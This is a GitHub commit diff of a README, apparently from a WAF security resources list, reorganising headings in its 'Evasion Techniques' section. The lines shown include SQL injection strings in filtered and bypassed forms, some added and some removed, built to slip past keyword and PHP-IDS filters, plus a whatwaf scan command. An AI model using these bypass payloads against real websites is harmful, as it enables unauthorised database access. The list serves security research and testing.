Update README.md

This commit is contained in:
Infected Drake 2019-02-08 18:56:46 +05:30 committed by GitHub
parent 72469e0cb0
commit f9a21ed5ba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1337,10 +1337,10 @@ Wanna detect WAFs? Lets see how.
</tr> </tr>
</table> </table>
## Evasion Techniques # Evasion Techniques
Lets look at some methods of bypassing and evading WAFs. Lets look at some methods of bypassing and evading WAFs.
### Fuzzing/Bruteforcing: ## Fuzzing/Bruteforcing:
#### Method: #### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing). - Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
@ -1358,14 +1358,16 @@ __Drawback:__
- This method often fails. - This method often fails.
- Many a times your IP will be blocked (temporarily/permanently). - Many a times your IP will be blocked (temporarily/permanently).
### Regex-Reversing: ## Regex-Reversing:
#### Method: ### Method:
- Most efficient method of bypassing WAFs. - Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases. - Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm. - Payload matches the reg-ex the WAF triggers alarm.
#### Techniques: #### Techniques:
__Scenario 1: SQL Injection__
##### • Step 1: ##### • Step 1:
__Keyword filer__: `and`, `or`, `union` __Keyword filer__: `and`, `or`, `union`
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)` __Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
@ -1423,24 +1425,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
- __Filtered Injection__: `1 || lpad(user,7,1)` - __Filtered Injection__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)` - __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
---
__PHP-IDS__ generally blocks input containing `=` or `(` or `'` following with any a string or integer e.g. `1 or 1=1`, `1 or '1'`, `1 or char(97)`. However, it can be bypassed using a statement that does not contain `=`, `(` or `'` symbols.
#### Scenario 1:
- __Filtered Injection__: `1 or 1 = 1`
- __Bypassed Injection__: `1 or 1`
#### Scenario 2:
- __Filtered injection__: `1 union select 1, table_name from information_schema.tables where table_name = 'users'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273`
__Drawbacks:__
- This method is time consuming.
## Google Dorks Approach: ## Google Dorks Approach:
## Known Bypasses: ## Known Bypasses:
@ -1649,4 +1633,4 @@ whatwaf -u <target> --ra --throttle 2
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/). - [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/). - [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits. - [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html). - [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).